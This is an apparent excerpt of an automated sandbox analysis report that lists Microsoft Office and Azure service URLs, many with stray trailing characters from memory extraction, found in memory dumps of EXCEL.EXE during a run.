    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize/
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize4)
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize8
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize9
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize=/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize?
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize?-
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeA)%
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeD..;.
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeE
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeE-
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeF
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeG
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeH
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeI
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeJ
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeJ/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeK
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeK.?;-
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeNjT;/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeP
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeQ
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeT
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeU
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeU.Q;/
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeV-P:
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeW
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeX
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeY
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeZ
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizecom
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorized
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeg)
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeh
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeh/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizei
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizei.
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeizez
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizej
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizej-
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizelj:;-
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizem
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizemi;:
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizent
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeo
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizep)2
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizet
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizet-
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeu
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizew
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizex
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizey
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizey/
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizez.
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize~
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize~i$:?
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://management.azure.com
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://management.azure.com/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://management.azure.com/7
    Source: EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://messaging.office.com/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech=9
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://ncus.contentsync.
    Source: EXCEL.EXE, 00000000.00000003.413455560.000000000F457000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.607735341.000000000F457000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: EXCEL.EXE, 00000000.00000002.608824531.0000000012F39000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.513076581.0000000012F33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.413539859.0000000012F33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.456932989.0000000012F33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472613834.0000000012F33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471316055.0000000012F33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.413742220.0000000012F33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472235778.0000000012F33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.474334086.0000000012F33000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeap
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules
    Source: EXCEL.EXE, 00000000.00000002.608462358.0000000012D34000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.4954.1000&ClientId=
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.comK
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://officeapps.live.com
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com#VS:
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com%WY;G
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com/WW;F
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com3WC;H
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com7VO:b
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com9VE:a
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comCW
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comL/
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comP6
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comQj
    Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comUi
